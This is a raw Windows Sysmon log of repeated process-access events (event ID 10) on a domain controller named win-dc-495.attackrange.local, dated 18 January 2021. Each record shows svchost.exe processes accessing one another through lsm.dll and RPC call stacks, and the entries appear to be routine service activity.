13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.461{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 